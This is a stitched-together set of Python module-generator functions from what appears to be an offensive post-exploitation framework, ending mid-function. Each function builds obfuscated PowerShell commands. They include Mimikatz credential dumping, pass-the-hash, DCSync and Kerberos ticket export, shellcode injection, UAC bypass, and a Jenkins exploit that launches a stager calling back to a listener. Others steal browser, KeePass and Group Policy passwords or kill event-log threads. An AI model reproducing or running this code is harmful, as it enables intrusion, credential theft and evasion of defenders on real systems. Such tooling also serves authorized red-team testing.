moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# If you'd just like to import a subset of the functions from the
# module source, use the following:
# script = helpers.generate_dynamic_powershell_script(moduleCode, ["Get-Something", "Set-Something"])
script = moduleCode
scriptEnd = "; shellcode injected into pid {}".format(str(procID))
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: {}".format(listenerName))
return ''
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == '':
print helpers.color('[!] Error in launcher generation.')
return ''
else:
launcherCode = launcher.split(' ')[-1]
sc = self.mainMenu.stagers.generate_shellcode(launcherCode, arch)
encoded_sc = helpers.encode_base64(sc)
# Add any arguments to the end execution of the script
#t = iter(sc)
#pow_array = ',0x'.join(a+b for a,b in zip(t, t))
#pow_array = "@(0x" + pow_array + " )"
script += "\nInvoke-Shellcode -ProcessID {} -Shellcode $([Convert]::FromBase64String(\"{}\")) -Force".format(procID, encoded_sc)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if credType != "hash":
print helpers.color("[!] An NTLM hash must be used!")
return ""
if userName != "":
self.options["user"]['Value'] = userName
if domainName != "":
self.options["domain"]['Value'] = domainName
if password != "":
self.options["ntlm"]['Value'] = password
if self.options["ntlm"]['Value'] == "":
print helpers.color("[!] ntlm hash not specified")
# build the custom command with whatever options we want
command = "sekurlsa::pth /user:"******"user"]['Value']
command += " /domain:" + self.options["domain"]['Value']
command += " /ntlm:" + self.options["ntlm"]['Value']
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"'"
scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-NinjaCopy.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "$null = Invoke-NinjaCopy "
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-BrowserData.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = moduleCode
scriptEnd = "\nGet-BrowserInformation "
# add any arguments to the end execution of the script
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n' + str(
moduleName) + ' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
domainController = self.options['DomainController']['Value']
computerName = self.options['ComputerName']['Value']
domainAccount = self.options['DomainServiceAccount']['Value']
checkMgmt = self.options['CheckMgmt']['Value']
udpTimeOut = self.options['UDPTimeOut']['Value']
username = self.options['Username']['Value']
password = self.options['Password']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
scriptEnd = " Get-SQLInstanceDomain"
if username != "":
scriptEnd += " -Username " + username
if password != "":
scriptEnd += " -Password " + password
if domainController != "":
scriptEnd += " -DomainController "+domainController
if computerName != "":
scriptEnd += " -ComputerName "+computerName
if domainAccount != "":
scriptEnd += " -DomainAccount "+domainAccount
if checkMgmt.lower() != "false":
scriptEnd += " -CheckMgmt"
if udpTimeOut != "":
scriptEnd += " -UDPTimeOut "+udpTimeOut
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"lsadump::dcsync /user:"******"domain"]['Value'] != "":
scriptEnd += " /domain:" + self.options['domain']['Value']
if self.options["dc"]['Value'] != "":
scriptEnd += " /dc:" + self.options['dc']['Value']
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Get-GPPPassword.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Get-GPPPassword "
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
scriptEnd += "'Get-GPPPassword completed'"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
modPath = "/data/module_source/credentials/Invoke-InternalMonologue.ps1"
moduleSource = self.mainMenu.installPath + modPath
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-InternalMonologue "
# Add any arguments to the end execution of the script
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
# Get the random function name generated at install and patch the stager with the proper function name
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd,
installPath=self.mainMenu.installPath,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# extract all of our options
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
#Cmd = launcher
print helpers.color("Agent Launcher code: "+ launcher)
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nExploit-Jenkins"
scriptEnd += " -Rhost "+str(self.options['Rhost']['Value'])
scriptEnd += " -Port "+str(self.options['Port']['Value'])
scriptEnd += " -Cmd \"" + launcher + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-ReverseDNSLookup.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-ReverseDNSLookup"
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
# only return objects where HostName is not an IP (i.e. the address resolves)
scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# add in the cert dumping command
scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
instance = self.options['Instance']['Value']
query = self.options['Query']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
scriptEnd = " Get-SQLQuery"
if username != "":
scriptEnd += " -Username " + username
if password != "":
scriptEnd += " -Password " + password
if instance != "":
scriptEnd += " -Instance " + instance
scriptEnd += " -Query " + "\'" + query + "\'"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-ARPScan.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-ARPScan "
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
scriptEnd += " | Select-Object MAC, Address | ft -autosize | Out-String | %{$_ + \"`n\"}"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-BypassUAC.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher)
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-ChromeDump.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = " Get-ChromeDump"
# add any arguments to the end execution of the script
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode + "\n"
scriptEnd = moduleName + " "
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n' + str(
moduleName) + ' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-Phant0m.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nInvoke-Phant0m"
for option, values in self.options.items():
if option.lower() != "agent" and option.lower() != "showall":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script += "| Out-String"
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
scriptCmd = "Invoke-X"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Unable to open script at the configured path: " + str(scriptPath)))
return ""
script = f.read()
f.close()
scriptEnd = "\n%s" %(scriptCmd)
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-PrintDemon.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-PrintDemon"
# Add any arguments to the end execution of the script
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd,
installPath=self.mainMenu.installPath,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-IndexedItem.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Get-IndexedItem "
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
# extract the fields we want
scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY"
scriptEnd += " | fl | Out-String;"
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script = moduleCode
scriptEnd = ';' + moduleName + " "
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-ShellcodeMSIL"
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values['Value'].split("\\"))[1:]
scriptEnd += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = moduleCode
# kill all KeePass instances first
scriptEnd = "\nGet-Process *keepass* | Stop-Process -Force"
scriptEnd += "\nFind-KeePassconfig | Add-KeePassConfigTrigger "
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# ridiculous escape format
groups = " ".join([
'"\\""' + group.strip().strip("'\"") + '"""'
for group in self.options["Groups"]['Value'].split(",")
])
# build the custom command with whatever options we want
command = '""misc::addsid ' + self.options["User"][
'Value'] + ' ' + groups
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nExploit-Jenkins"
scriptEnd += " -Rhost " + str(self.options['Rhost']['Value'])
scriptEnd += " -Port " + str(self.options['Port']['Value'])
command = str(self.options['Cmd']['Value'])
# if the command contains spaces, wrap it in quotes before passing to ps script
if " " in command:
scriptEnd += " -Cmd \"" + command + "\""
else:
scriptEnd += " -Cmd " + command
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# build the dump command with whatever options we want
scriptEnd = "Invoke-Mimikatz -DumpCreds;"
for option,values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
